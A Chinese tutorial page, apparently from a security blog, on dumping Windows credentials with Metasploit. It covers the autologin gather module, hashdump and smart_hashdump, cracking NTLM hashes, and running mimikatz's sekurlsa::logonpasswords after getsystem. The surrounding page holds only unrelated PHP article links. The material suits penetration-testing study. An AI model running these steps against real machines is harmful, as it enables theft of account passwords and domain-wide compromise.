投稿获客
  1. 创想鸟首页
  2. 系统教程

工具的使用|MSF中获取用户密码

程序猿 系统教程 阅读 0

目录

获取用户密码

抓取自动登录的密码

导出密码哈希

上传mimikatz程序

加载kiwi模块

加载mimikatz模块

获取用户密码

工具的使用|MSF中获取用户密码

抓取自动登录的密码

1:很多用户习惯将计算机设置自动登录,可以使用 

run windows/gather/credentials/windows_autologin

抓取自动登录的用户名和密码

工具的使用|MSF中获取用户密码

导出密码哈希

2:hashdump 模块可以从SAM数据库中导出本地用户账号,执行:run hashdump ,该命令的使用需要系统权限

工具的使用|MSF中获取用户密码

用户哈希数据的输出格式为:

代码语言:javascript代码运行次数:0运行复制

用户名:SID:LM哈希:NTLM哈希:::


所以我们得到了三个用户账号,分别为Administrator、Guest和小谢。


其中Administrator和Guest的LM哈希(aad3b435b51404eeaad3b435b51404ee)和NTLM哈希(31d6cfe0d16ae931b73c59d7e0c089c0)对应的是一个空密码。所以,只有小谢的哈希有效。


                                                                        黑点工具                                                                            黑点工具                            


在线工具导航网站,免费使用无需注册,快速使用无门槛。


                                                            黑点工具                                18                                                                                                        查看详情                            黑点工具                                                            


接下来要处理的就是用户小谢 的密码( a86d277d2bcd8c8184b01ac21b6985f6 )了。我们可以使用类似John这样的工具来破解密码:John破解Windows系统密码,或者使用在线网站解密:https://www.cmd5.com/default.aspx


工具的使用|MSF中获取用户密码


还可以使用命令:run windows/gather/smart_hashdump  ,该命令的使用需要系统权限。该功能更强大,如果当前用户是域管理员用户,则可以导出域内所有用户的hash


工具的使用|MSF中获取用户密码


上传mimikatz程序


3:我们还可以通过上传mimikatz程序,然后执行mimikatz程序来获取明文密码。


执行mimikatz必须System权限。


我们先getsystem提权至系统权限,然后执行  execute  -i  -f  mimikatz.exe ,进入mimikatz的交互界面。然后执行:


privilege::debugsekurlsa::logonpasswords


工具的使用|MSF中获取用户密码


加载kiwi模块


4:加载kiwi模块,该模块的使用需要System权限。关于该模块的用法:


工具的使用 | MSF中kiwi模块的使用


加载mimikatz模块


5:或者运行MSF里面自带的 mimikatz 模块 ,该模块的使用需要System权限。传送门:工具的使用|MSF中mimikatz模块的使用。目前该模块已经被kiwi模块代替了。


以上就是工具的使用|MSF中获取用户密码的详细内容,更多请关注创想鸟其它相关文章!


                                                        
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。

如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 chuangxiangniao@163.com 举报,一经查实,本站将立刻删除。

发布者:程序猿,转转请注明出处:https://www.chuangxiangniao.com/p/400332.html
(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
0 0

关于作者

程序猿的头像

程序猿签约作者

288.3K 文章
0 评论
1 粉丝
这个人很懒,什么都没有留下~
上一篇 2025年11月6日 19:11:29
下一篇 2025年11月6日 19:12:52

相关推荐

  • 如何修复 Windows 上的 PHP Curl HTTPS 证书颁发机构问题 好文分享

    如何修复 Windows 上的 PHP Curl HTTPS 证书颁发机构问题

    成功的 HTTPS 请求涉及 HTTP 客户端验证 服务器根据已知且受信任的根列表提供的 TLS 证书 证书。 PHP Curl 扩展没有什么不同;卷曲 扩展使用 libcurl 发出 HTTPS 请求,而 libcurl 又使用 OpenSSL 等 TLS 库来验证请求。 Curl 扩展需要一个包…

    程序猿的头像 程序猿
    2025年12月9日
    000
  • ‌一文了解:TypeScript和‌JavaScript的主要区别 好文分享

    ‌一文了解:TypeScript和‌JavaScript的主要区别

    JavaScript 和 TypeScript 是两种流行的编程语言,具有不同的特性和优点:类型系统:JavaScript 是弱类型的,而 TypeScript 是强类型的,要求变量指定类型。静态类型检查:JavaScript 是解释型的,并在运行时检测错误,而 TypeScript 是编译型的,并…

    程序猿的头像 程序猿
    2025年12月9日
    000
  • PHP 调用接口返回为空:如何排查 SoapClient 问题? 好文分享

    PHP 调用接口返回为空:如何排查 SoapClient 问题?

    php 调用接口返回始终为空 在使用 soapclient 调用接口时,如果你发现返回结果一直为空,可能是因为以下原因: soap 扩展未启用 php 的 soap 扩展用于处理 soap 请求。如果你未启用此扩展,则无法使用 soapclient。可以使用以下步骤检查 soap 扩展是否已启用: …

    程序猿的头像 程序猿
    2025年12月9日
    000
  • 如何使用 PHP 连接 SQL Server 数据库? 好文分享

    如何使用 PHP 连接 SQL Server 数据库?

    如何通过 php 连接 sql server? 在 php 中连接 microsoft sql server 需要采取以下步骤: 1. 下载 sql server 驱动 前往 microsoft 网站下载适用于 php 的 sql server 驱动程序。 2. 安装驱动 立即学习“PHP免费学习笔…

    程序猿的头像 程序猿
    2025年12月9日
    000
  • 如何用 PHP 连接 SQL Server? 好文分享

    如何用 PHP 连接 SQL Server?

    php 连接 sql server 详解 想要在 php 中连接 sql server,以下是一步步的指南: 安装 sql server 驱动程序 在 php 中连接 sql server,需要先安装 sql server 驱动程序。可以在 php 手册中找到适用于 windows(sqlsrv)和…

    程序猿的头像 程序猿
    2025年12月9日
    000
  • 如何使用 PHP 连接到 SQL Server 数据库? 好文分享

    如何使用 PHP 连接到 SQL Server 数据库?

    谁会用PHP连接SQL Server? 问题: 有没有人知道如何使用 PHP 连接到 SQL Server 数据库? 答案: 立即学习“PHP免费学习笔记(深入)”; 这里有一些资源可以帮助您: [在 Windows 下的 PHP 连接到 Microsoft SQL Server](http://w…

    程序猿的头像 程序猿
    2025年12月9日
    000
  • 配置低的电脑可以安装 Linux 系统吗? 好文分享

    配置低的电脑可以安装 Linux 系统吗?

    配置低的电脑是否能安装 Linux 系统? 想要学习 Linux,但经济紧张只能购买旧电脑,对配置要求存在疑问。本文将针对这个问题展开解答,为您提供详细的指导。 Linux 系统对配置的要求 Linux 系统对硬件配置的要求相对较低,这一点与 Windows 等系统不同。一般来说,具有以下配置的电脑…

    程序猿的头像 程序猿
    2025年12月9日
    000
  • 低配电脑能流畅运行Linux系统吗? 好文分享

    低配电脑能流畅运行Linux系统吗?

    低配电脑能否安装 Linux 系统 对于想学习 Linux 系统但经济紧张的朋友,购买一台旧电脑是不错的选择。不过,在这之前,我们先来探讨一下低配电脑是否适合安装 Linux。 Linux 系统是一种轻量级的操作系统,相对于 Windows 系统来说,对硬件要求较低。一台低配电脑,例如配备了第一代主…

    程序猿的头像 程序猿
    2025年12月9日
    000
  • 访问同一网站出现 DNS_PROBE_FINISHED_NXDOMAIN 错误,如何排查问题? 好文分享

    访问同一网站出现 DNS_PROBE_FINISHED_NXDOMAIN 错误,如何排查问题?

    访问同一网站出现 DNS_PROBE_FINISHED_NXDOMAIN,排查问题指南 当访问同一网站时,出现有的电脑显示 DNS_PROBE_FINISHED_NXDOMAIN 而有的电脑能够正常显示的情况,需要对问题电脑进行排查。 首先,确保两台电脑都能正常上网并访问其他网站,排除网络连接和设备…

    程序猿的头像 程序猿
    2025年12月9日
    000
  • 网页php代码怎么查 好文分享

    网页php代码怎么查

    查看网页中 PHP 代码有三种方法:直接查看源代码、使用浏览器开发工具或第三方工具。 如何在网页中查看 PHP 代码 直接查看源代码 最简单的方法是直接查看网页的源代码。在大多数网络浏览器中,可以通过以下步骤进行操作: 按下键盘上的“Ctrl + U”(Windows)或“Command + U”(…

    程序猿的头像 程序猿
    2025年12月9日
    000
  • VIRTUALGROHOUSE 的 PHP 初学者指南 好文分享

    VIRTUALGROHOUSE 的 PHP 初学者指南

    您好,我正在制作一个简单的 PHP 指南,以帮助我自己和其他人成为 webdevs。祝你好运,万事如意! 请关注我的旅程并向我提问!我正在和你一起学习,所以集思广益会很好! 警告:完成后我会将 URL 发布到此处,在此之前,如果此消息在此,则表示尚未准备好 第 1 章:PHP 基础知识1.1 语法1…

    程序猿的头像 程序猿
    2025年12月9日
    000
  • 善用 PHP 正则表达式,提升字符串处理效率 好文分享

    善用 PHP 正则表达式,提升字符串处理效率

    正则表达式可有效提升 php 字符串处理效率。通过实战案例,本文展示了如何利用正则表达式:验证电子邮件地址替换字符串中的所有空格从 html 中提取链接匹配特定格式的日期 善用 PHP 正则表达式,提升字符串处理效率 正则表达式是一种强大的文本搜索和替换工具,在处理字符串时可以显著提高 PHP 应用…

    程序猿的头像 程序猿
    2025年12月9日
    000
  • PHP函数代码风格的在线资源 好文分享

    PHP函数代码风格的在线资源

    PHP 函数代码风格的在线资源 保持一致的代码风格对于代码可读性和可维护性至关重要。对于 PHP,有一些在线资源可以帮助您遵守最佳实践。 PHP_CodeSniffer PHP_CodeSniffer 是一款静态分析工具,可根据一组预定义的规则检查 PHP 代码。它可以检测编码标准违规并建议修复。您…

    程序猿的头像 程序猿
    2025年12月9日
    000
  • PHP 函数命名规范解读:面向对象命名惯例 好文分享

    PHP 函数命名规范解读:面向对象命名惯例

    php oop 函数命名规范要求:私有函数以下划线开头。公共方法以小写字母开头。类方法后缀与方法类型匹配(getter:_get、setter:_set、其他:_do)。静态方法以小写字母和下划线开头,后跟方法名称。函数名称应描述功能,明确参数和返回值,避免缩写和混淆术语。 PHP 函数命名规范解读…

    程序猿的头像 程序猿
    2025年12月9日
    000
  • 自定义函数封装对象和方法 好文分享

    自定义函数封装对象和方法

    自定义函数封装对象和方法 简介自定义函数是一种将代码组织成可重用组件的强大技术,可以提高代码的可读性和可维护性。封装是面向对象编程的一项基本原则,它涉及到将数据及其相关方法捆绑成单一对象。 实战案例让我们从一个简单的学生对象开始,该对象包含有关学生姓名、学号和成绩的信息: class Student…

    程序猿的头像 程序猿
    2025年12月9日
    000
  • php函数跨语言调用实战指导 好文分享

    php函数跨语言调用实战指导

    #%#$#%@%@%$#%$#%#%#$%@_e1bfd762321e409c++ee4ac0b6e841963c 可通过外部函数接口(ffi)实现与其他语言的跨语言调用。实战案例:安装 ffi 扩展定义 c++ 函数签名加载 c++ 函数库使用 ffi 库调用 c++ 函数,实现从 php 调用其…

    程序猿的头像 程序猿
    2025年12月9日
    000
  • 充分利用 PHP 函数的内置特性 好文分享

    充分利用 PHP 函数的内置特性

    充分利用 php 的内置函数,可显著简化代码:数组处理函数:array_filter() 过滤元素、array_map() 应用回调函数、array_reduce() 归约数组、array_diff() 计算差集、array_combine() 组合数组。字符串处理函数:strlen() 获取长度、…

    程序猿的头像 程序猿
    2025年12月9日
    000
  • 精简 PHP 函数参数,提升调用性能 好文分享

    精简 PHP 函数参数,提升调用性能

    精简 php 函数参数可提升调用性能:1. 合并重复参数;2. 传递可选参数;3. 使用默认值;4. 使用解构赋值。优化后,在商品销售网站的 calculate_shipping_cost 函数案例中,将默认值分配给 is_free_shipping 参数显著提升了性能,降低了执行时间。 精简 PH…

    程序猿的头像 程序猿
    2025年12月9日
    000
  • 使用linter工具实现PHP函数参数类型检查 好文分享

    使用linter工具实现PHP函数参数类型检查

    通过使用linter工具phpstan,我们可以实现php函数参数的类型检查。phpstan是一种静态分析工具,可通过分析变量类型的推断来检查函数参数类型。我们可以使用composer安装phpstan并通过配置phpstan.neon文件来设置检查级别。phpstan通过类型断言和严格类型检查来检…

    程序猿的头像 程序猿
    2025年12月9日
    000
  • 遵循 PHP 函数命名约定可获得的社区支持 好文分享

    遵循 PHP 函数命名约定可获得的社区支持

    遵循 php 函数命名约定可获得以下社区支持:提高代码可读性,使代码易于阅读和理解。简化维护,使代码易于维护和更新。更好的社区支持,在在线论坛中更容易获得帮助。 遵循 PHP 函数命名约定可获得的社区支持 PHP 函数命名约定是一种行业规范,旨在确保代码一致且易于维护。遵循这些约定可以提高代码可读性…

    程序猿的头像 程序猿
    2025年12月9日
    000

发表回复

登录后才能评论
关注微信